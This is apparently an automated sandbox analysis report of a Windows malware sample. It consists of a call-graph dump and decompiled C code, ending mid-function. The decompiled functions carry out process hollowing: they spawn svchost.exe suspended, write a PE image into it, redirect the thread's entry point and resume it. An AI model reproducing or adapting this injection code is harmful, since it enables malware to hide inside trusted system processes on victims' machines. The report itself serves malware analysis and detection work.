4006ca0 _realloc __VEC_memcpy 18300->18301 18301->18300 18305 4017240 _memset codecvt 18302->18305 18303 401724c 18303->18284 18304 401e8c0 __VEC_memcpy 18304->18305 18305->18303 18305->18304 18859 4018f70 18862 4018f7a codecvt 18859->18862 18861 4018faa 18862->18861 18863 401c930 18862->18863 18869 401c940 codecvt 18863->18869 18865 401c97a 18865->18862 18866 4023590 __VEC_memcpy 18866->18869 18867 4028060 __VEC_memcpy 18867->18869 18869->18865 18869->18866 18869->18867 18870 40267c0 18869->18870 18876 4024050 18869->18876 18872 40267cd _memset codecvt 18870->18872 18871 40255a0 __VEC_memcpy 18871->18872 18872->18871 18873 4024ae0 __VEC_memcpy 18872->18873 18874 40255c0 __VEC_memcpy 18872->18874 18875 40267df 18872->18875 18873->18872 18874->18872 18875->18869 18877 4024067 18876->18877 18879 402407f 18877->18879 18882 40245b0 18877->18882 18886 4024aa0 18879->18886 18883 40245c9 18882->18883 18885 40245e1 18883->18885 18889 4014fd0 18883->18889 18885->18879 18901 4024820 18886->18901 18890 4014ff2 18889->18890 18893 4014ae0 18890->18893 18892 4015075 18892->18885 18900 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 18893->18900 18894 4014ea7 setSBUpLow 18894->18892 18895 401e730 __VEC_memcpy 18895->18900 18896 401f9f0 __VEC_memcpy 18896->18900 18897 401efb0 __VEC_memcpy 18897->18900 18898 401ebc0 __VEC_memcpy 18898->18900 18899 4020050 __VEC_memcpy 18899->18900 18900->18894 18900->18895 18900->18896 18900->18897 18900->18898 18900->18899 18907 4024830 codecvt std::_Iterator_base::_Iterator_base _strlen 18901->18907 18902 402409f 18902->18869 18903 401fc90 __VEC_memcpy 18903->18907 18904 4015c60 __VEC_memcpy 18904->18907 18907->18902 18907->18903 18907->18904 18910 40246a0 18907->18910 18915 40242c0 18907->18915 18923 40243f0 18907->18923 18931 4024180 18907->18931 18912 40246ba codecvt std::_Iterator_base::_Iterator_base _strlen 18910->18912 18911 40246de setSBUpLow 18911->18907 18912->18911 18913 401fc90 __VEC_memcpy 18912->18913 18914 4015c60 __VEC_memcpy 18912->18914 18913->18912 18914->18912 18916 4024330 18915->18916 18917 4006ca0 _realloc __VEC_memcpy 18916->18917 18918 40243a0 18917->18918 18919 4006ca0 _realloc __VEC_memcpy 18918->18919 18920 40243b7 18919->18920 18921 4006ca0 _realloc __VEC_memcpy 18920->18921 18922 40243d0 setSBUpLow 18921->18922 18922->18907 18924 4024460 18923->18924 18925 4006ca0 _realloc __VEC_memcpy 18924->18925 18926 40244d0 18925->18926 18927 4006ca0 _realloc __VEC_memcpy 18926->18927 18928 40244e7 18927->18928 18929 4006ca0 _realloc __VEC_memcpy 18928->18929 18930 4024500 setSBUpLow 18929->18930 18930->18907 18932 4024200 18931->18932 18933 4006ca0 _realloc __VEC_memcpy 18932->18933 18934 4024270 18933->18934 18935 4006ca0 _realloc __VEC_memcpy 18934->18935 18936 4024287 18935->18936 18937 4006ca0 _realloc __VEC_memcpy 18936->18937 18938 40242a0 setSBUpLow 18937->18938 18938->18907 18158 4023270 18161 4023276 codecvt 18158->18161 18159 402327c codecvt 18161->18159 18162 401f9f0 __VEC_memcpy 18161->18162 18164 4022b80 18161->18164 18168 401f8b0 18161->18168 18162->18161 18165 402305c codecvt setSBUpLow 18164->18165 18166 4022bb5 _memset codecvt 18164->18166 18165->18161 18166->18165 18167 4006ca0 _realloc __VEC_memcpy 18166->18167 18167->18166 18170 401f8bd codecvt 18168->18170 18169 401f8cf 18169->18161 18170->18169 18171 4006ca0 __VEC_memcpy _realloc 18170->18171 18171->18170 18545 4008cf2 18546 4008cfe 6 library calls 18545->18546 18553 400c4a5 18546->18553 18548 4008dac __setargv __amsg_exit __setenvp 18557 4009a9d 18548->18557 18550 4008dd9 __wincmdln __amsg_exit 18561 40210d0 18550->18561 18552 4008e05 __close 18554 400c4c3 __malloc_crt 18553->18554 18555 4006ca0 _realloc __VEC_memcpy 18554->18555 18556 400c4cb __getptd_noexit __malloc_crt 18554->18556 18555->18556 18556->18548 18558 4009aab __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 18557->18558 18560 4009ae8 __IsNonwritableInCurrentImage __initterm 18558->18560 18569 4007252 18558->18569 18560->18550 18562 40210e8 18561->18562 18590 4020e40 18562->18590 18564 402114a 18595 4021a50 18564->18595 18567 40213ad codecvt setSBUpLow 18567->18552 18568 4021154 18568->18567 18599 4019020 18568->18599 18572 4007216 18569->18572 18571 400725f 18571->18560 18573 4007222 __cinit __close 18572->18573 18576 400712b 18573->18576 18575 4007233 __cinit __close 18575->18571 18577 400713f __decode_pointer __msize 18576->18577 18578 4007191 18577->18578 18579 40071a7 __encode_pointer 18577->18579 18582 40098bd 18577->18582 18578->18579 18581 40098bd __realloc_crt __VEC_memcpy 18578->18581 18579->18575 18581->18579 18585 40098c6 18582->18585 18584 4009905 18584->18578 18585->18584 18586 400d4ce 18585->18586 18588 400d4da 7 library calls 18586->18588 18587 400d4e1 __dosmaperr __close __getptd_noexit _realloc _malloc 18587->18585 18588->18587 18589 4006ca0 __VEC_memcpy _realloc 18588->18589 18589->18588 18593 4020e54 _strlen 18590->18593 18592 4020e7b codecvt 18592->18564 18593->18592 18594 4006ca0 __VEC_memcpy _realloc 18593->18594 18605 4021d30 18593->18605 18594->18593 18597 4021a6a _memset codecvt 18595->18597 18598 4021cf4 setSBUpLow 18597->18598 18611 4021460 18597->18611 18598->18568 18604 4019030 codecvt 18599->18604 18600 401903b 18600->18568 18601 4023970 __VEC_memcpy 18601->18604 18602 4017410 __VEC_memcpy 18602->18604 18603 4016980 __VEC_memcpy 18603->18604 18604->18600 18604->18601 18604->18602 18604->18603 18606 4021f18 codecvt 18605->18606 18610 4021d4b _memset 18605->18610 18606->18593 18607 4006ca0 __VEC_memcpy _realloc 18607->18610 18608 4006ca0 _realloc __VEC_memcpy 18608->18606 18609 4021efd 18609->18606 18609->18608 18610->18606 18610->18607 18610->18609 18613 4021477 _memset 18611->18613 18612 4021489 setSBUpLow 18612->18597 18613->18612 18614 4006ca0 _realloc __VEC_memcpy 18613->18614 18614->18613 18762 4028130 18763 402813f 18762->18763 18764 4007252 __cinit __VEC_memcpy 18763->18764 18765 4028149 18764->18765 19035 40233f0 19039 40233f6 codecvt 19035->19039 19036 40233fc 19037 401f620 __VEC_memcpy 19037->19039 19039->19036 19039->19037 19040 4026c40 19039->19040 19042 4026c7b codecvt std::_Iterator_base::_Iterator_base 19040->19042 19041 4026cb6 codecvt setSBUpLow 19041->19039 19042->19041 19044 401f9f0 __VEC_memcpy 19042->19044 19045 4022700 19042->19045 19044->19042 19046 4022717 19045->19046 19048 40227e6 codecvt 19045->19048 19047 4006ca0 _realloc __VEC_memcpy 19046->19047 19046->19048 19047->19048 19048->19042 18306 40014b3 18308 40014c2 18306->18308 18307 400161a 18308->18307 18309 4001430 QueryPerformanceCounter 18308->18309 18310 4001514 18309->18310 18311 4001430 QueryPerformanceCounter 18310->18311 18312 4001524 18311->18312 18313 4001160 7 API calls 18312->18313 18314 4001549 18313->18314 18315 400160d Sleep 18314->18315 18316 400155f 18314->18316 18315->18307 18317 40013b0 2 API calls 18316->18317 18318 4001572 lstrcat GetTickCount 18317->18318 18319 40010e0 2 API calls 18318->18319 18320 40015ad 18319->18320 18321 4001040 2 API calls 18320->18321 18322 40015ea closesocket 18321->18322 18322->18307 18615 40016f4 18619 400166f 18615->18619 18616 400167c WaitForSingleObject 18617 40016a3 GetExitCodeProcess 18616->18617 18618 400168f TerminateProcess 18616->18618 18617->18619 18624 4001735 18618->18624 18619->18616 18620 40016cc Sleep 18619->18620 18621 40016e5 SetEvent 18619->18621 18622 40016f6 CloseHandle Sleep 18619->18622 18619->18624 18625 4001dc0 8 API calls 18619->18625 18620->18619 18621->18624 18623 40023e0 32 API calls 18622->18623 18623->18619 18625->18619 18172 401b077 18174 401affe 18172->18174 18173 401b015 codecvt 18174->18173 18175 401b083 18174->18175 18182 401a890 18174->18182 18178 401cd80 18175->18178 18181 401cd90 codecvt 18178->18181 18179 401cda8 18179->18173 18180 4006ca0 _realloc __VEC_memcpy 18180->18181 18181->18179 18181->18180 18185 401a8b7 _memset codecvt _strnlen _strlen 18182->18185 18183 401a8cf codecvt setSBUpLow 18183->18174 18184 4006ca0 _realloc __VEC_memcpy 18184->18185 18185->18183 18185->18184 18187 401d100 18185->18187 18188 401d128 _memset 18187->18188 18189 401d142 codecvt setSBUpLow 18188->18189 18190 4006ca0 __VEC_memcpy _realloc 18188->18190 18191 4006410 __VEC_memcpy 18188->18191 18189->18185 18190->18188 18191->18188 18323 40190bd 18328 4019030 codecvt 18323->18328 18324 401903b 18328->18324 18329 4017410 18328->18329 18333 4016980 18328->18333 18337 4023970 18328->18337 18331 401742d 18329->18331 18332 401753f _memset 18331->18332 18353 4004d10 18331->18353 18332->18328 18334 4016987 18333->18334 18335 401698d 18334->18335 18336 4006410 __VEC_memcpy 18334->18336 18335->18328 18336->18334 18338 4023980 18337->18338 18339 401efb0 __VEC_memcpy 18338->18339 18340 40239f5 18339->18340 18341 4006ca0 _realloc __VEC_memcpy 18340->18341 18342 4023a6a 18341->18342 18357 40048c0 18342->18357 18344 4023ab4 18347 4023b21 18344->18347 18375 4004600 18344->18375 18348 4023b88 18347->18348 18385 40044b0 18347->18385 18350 4023bef 18348->18350 18391 4004b60 18348->18391 18351 4023c56 18350->18351 18352 4004d10 __VEC_memcpy 18350->18352 18351->18328 18352->18350 18354 4004d20 18353->18354 18355 401efb0 __VEC_memcpy 18354->18355 18356 4004d74 18355->18356 18356->18331 18358 40048d0 18357->18358 18401 401ef30 18358->18401 18361 401efb0 __VEC_memcpy 18362 4004921 18361->18362 18363 401efb0 __VEC_memcpy 18362->18363 18364 400494e 18363->18364 18365 401efb0 __VEC_memcpy 18364->18365 18366 4004963 18365->18366 18367 401efb0 __VEC_memcpy 18366->18367 18368 4004978 18367->18368 18369 401efb0 __VEC_memcpy 18368->18369 18370 400498d 18369->18370 18371 401efb0 __VEC_memcpy 18370->18371 18372 40049a2 18371->18372 18373 401efb0 __VEC_memcpy 18372->18373 18374 40049c3 18373->18374 18374->18344 18376 4004610 18375->18376 18377 401efb0 __VEC_memcpy 18376->18377 18378 400464c 18377->18378 18379 401efb0 __VEC_memcpy 18378->18379 18380 4004661 18379->18380 18381 401efb0 __VEC_memcpy 18380->18381 18382 4004676 18381->18382 18383 4006ca0 _realloc __VEC_memcpy 18382->18383 18384 40046b4 18383->18384 18384->18344 18386 40044c0 18385->18386 18387 401efb0 __VEC_memcpy 18386->18387 18388 40044fc 18387->18388 18389 401efb0 __VEC_memcpy 18388->18389 18390 4004535 18389->18390 18390->18347 18392 4004b70 18391->18392 18393 401efb0 __VEC_memcpy 18392->18393 18394 4004bac 18393->18394 18395 401efb0 __VEC_memcpy 18394->18395 18396 4004bc1 18395->18396 18397 401efb0 __VEC_memcpy 18396->18397 18398 4004bd6 18397->18398 18399 4004c53 18398->18399 18400 401efb0 __VEC_memcpy 18398->18400 18399->18348 18400->18398 18403 401ef3d 18401->18403 18402 400490c 18402->18361 18403->18402 18404 4006ca0 _realloc __VEC_memcpy 18403->18404 18404->18403

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                                                                                                                      			E04001F80(intOrPtr _a4, signed char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                                                                                      				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                      				intOrPtr _v1016;
                                                                                                                                                                                                                                                                      				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                      				intOrPtr _v1096;
                                                                                                                                                                                                                                                                      				void _v1100;
                                                                                                                                                                                                                                                                      				signed int _v1104;
                                                                                                                                                                                                                                                                      				void* _t121;
                                                                                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                                                                                      				int _t130;
                                                                                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                                                                                      				int _t140;
                                                                                                                                                                                                                                                                      				int _t143;
                                                                                                                                                                                                                                                                      				int _t145;
                                                                                                                                                                                                                                                                      				int _t148;
                                                                                                                                                                                                                                                                      				void* _t180;
                                                                                                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                                                                                                      				void* _t265;
                                                                                                                                                                                                                                                                      				void* _t266;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                                                                                                                                      					L26:
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                      				_t121 =  *0x400304c( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                                                                                                                                      					 *0x400304c( &_v276, " ");
                                                                                                                                                                                                                                                                      					_t121 =  *0x400304c( &_v276, _a12);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E04001260(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                      				E04001260( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                      				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                      				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                      				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                      				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                      				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                      				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                      				_v12 = _t128;
                                                                                                                                                                                                                                                                      				if(_v12 != 0) {
                                                                                                                                                                                                                                                                      					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                      					if(_t130 != 0) {
                                                                                                                                                                                                                                                                      						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                      						_v1100 = _t132;
                                                                                                                                                                                                                                                                      						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                      							L10:
                                                                                                                                                                                                                                                                      							E04001310(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                      							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                      							_v1104 = 0;
                                                                                                                                                                                                                                                                      							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                      								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                      									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                      									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							E04001C00(_v12, _v1100);
                                                                                                                                                                                                                                                                      							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                      							if(_t140 != 0) {
                                                                                                                                                                                                                                                                      								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                      								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                      								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                      								if(_t143 != 0) {
                                                                                                                                                                                                                                                                      									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                      									if(_t145 != 0) {
                                                                                                                                                                                                                                                                      										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                      										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                      										if(_t148 == 0) {
                                                                                                                                                                                                                                                                      											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                      											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                      											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                      										return _v1012.hProcess;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                      									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                      									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                      									return 0;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                      								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                      								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                      							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                      							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                      							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                      							return 0;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t180 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40); // executed
                                                                                                                                                                                                                                                                      						_v1100 = _t180;
                                                                                                                                                                                                                                                                      						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                      							goto L10;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                      						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                      						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                      						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}

























                                                                                                                                                                                                                                                                      0x04001f8d
                                                                                                                                                                                                                                                                      0x040023d2
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040023d2
                                                                                                                                                                                                                                                                      0x04001fa4
                                                                                                                                                                                                                                                                      0x04001fb6
                                                                                                                                                                                                                                                                      0x04001fc0
                                                                                                                                                                                                                                                                      0x04001fce
                                                                                                                                                                                                                                                                      0x04001fdf
                                                                                                                                                                                                                                                                      0x04001fdf
                                                                                                                                                                                                                                                                      0x04001ff0
                                                                                                                                                                                                                                                                      0x04002003
                                                                                                                                                                                                                                                                      0x04002008
                                                                                                                                                                                                                                                                      0x0400200b
                                                                                                                                                                                                                                                                      0x0400201e
                                                                                                                                                                                                                                                                      0x04002038
                                                                                                                                                                                                                                                                      0x04002047
                                                                                                                                                                                                                                                                      0x04002057
                                                                                                                                                                                                                                                                      0x0400205d
                                                                                                                                                                                                                                                                      0x04002064
                                                                                                                                                                                                                                                                      0x04002090
                                                                                                                                                                                                                                                                      0x04002098
                                                                                                                                                                                                                                                                      0x040020ce
                                                                                                                                                                                                                                                                      0x040020d4
                                                                                                                                                                                                                                                                      0x040020e1
                                                                                                                                                                                                                                                                      0x0400214d
                                                                                                                                                                                                                                                                      0x0400215f
                                                                                                                                                                                                                                                                      0x04002164
                                                                                                                                                                                                                                                                      0x04002167
                                                                                                                                                                                                                                                                      0x04002182
                                                                                                                                                                                                                                                                      0x0400219e
                                                                                                                                                                                                                                                                      0x0400222e
                                                                                                                                                                                                                                                                      0x04002233
                                                                                                                                                                                                                                                                      0x040021a0
                                                                                                                                                                                                                                                                      0x040021e2
                                                                                                                                                                                                                                                                      0x040021e7
                                                                                                                                                                                                                                                                      0x040021e7
                                                                                                                                                                                                                                                                      0x0400217c
                                                                                                                                                                                                                                                                      0x0400217c
                                                                                                                                                                                                                                                                      0x04002246
                                                                                                                                                                                                                                                                      0x04002266
                                                                                                                                                                                                                                                                      0x0400226e
                                                                                                                                                                                                                                                                      0x040022bc
                                                                                                                                                                                                                                                                      0x040022c2
                                                                                                                                                                                                                                                                      0x040022da
                                                                                                                                                                                                                                                                      0x040022e2
                                                                                                                                                                                                                                                                      0x04002330
                                                                                                                                                                                                                                                                      0x04002338
                                                                                                                                                                                                                                                                      0x04002376
                                                                                                                                                                                                                                                                      0x0400238a
                                                                                                                                                                                                                                                                      0x04002392
                                                                                                                                                                                                                                                                      0x040023b2
                                                                                                                                                                                                                                                                      0x040023bf
                                                                                                                                                                                                                                                                      0x040023cc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040023cc
                                                                                                                                                                                                                                                                      0x0400239b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040023a1
                                                                                                                                                                                                                                                                      0x04002343
                                                                                                                                                                                                                                                                      0x04002350
                                                                                                                                                                                                                                                                      0x0400235d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04002363
                                                                                                                                                                                                                                                                      0x040022ed
                                                                                                                                                                                                                                                                      0x040022fa
                                                                                                                                                                                                                                                                      0x04002307
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400230d
                                                                                                                                                                                                                                                                      0x04002279
                                                                                                                                                                                                                                                                      0x04002286
                                                                                                                                                                                                                                                                      0x04002293
                                                                                                                                                                                                                                                                      0x040022a4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040022aa
                                                                                                                                                                                                                                                                      0x040020f7
                                                                                                                                                                                                                                                                      0x040020fd
                                                                                                                                                                                                                                                                      0x0400210a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04002115
                                                                                                                                                                                                                                                                      0x04002122
                                                                                                                                                                                                                                                                      0x0400212f
                                                                                                                                                                                                                                                                      0x04002140
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04002146
                                                                                                                                                                                                                                                                      0x040020a5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04002066
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04002066

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 04001FA4
                                                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,\system32\svchost.exe), ref: 04001FB6
                                                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0400317C), ref: 04001FCE
                                                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 04001FDF
                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002057
                                                                                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04002090
                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040020A5
                                                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040020CE
                                                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 040020F7
                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 04002115
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 04002122
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0400212F
                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002140
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                      • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                      • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                      • Opcode ID: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                                      • Instruction ID: 1d4488b5fdb617a131862b70200c6806e4887f475a197b4823290bb3b9e97252
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07D13EB1A00215ABDB29CF54DC94FAEB7B9FB48704F0485D8F709A7280D678AE80CF55
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E04001DC0(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                                                                                                      				void* _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				long _v28;
                                                                                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                                                                                      				void* _t78;
                                                                                                                                                                                                                                                                      				int _t85;
                                                                                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                                                                                      					return _v8;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                      					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                      					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                      					_t75 = VirtualAlloc(0, _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                      					_v16 = _t75;
                                                                                                                                                                                                                                                                      					if(_v16 != 0) {
                                                                                                                                                                                                                                                                      						_t78 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                      						_v32 = _t78;
                                                                                                                                                                                                                                                                      						if(_v32 != 0) {
                                                                                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                                                                                      							E04001310(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                      							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                      							_v36 = 0;
                                                                                                                                                                                                                                                                      							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                      								E04001310(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                      								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                      								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							E04001C00(_v16, _v32);
                                                                                                                                                                                                                                                                      							_t85 = WriteProcessMemory(_a4, _v32, _v16, _v12, 0); // executed
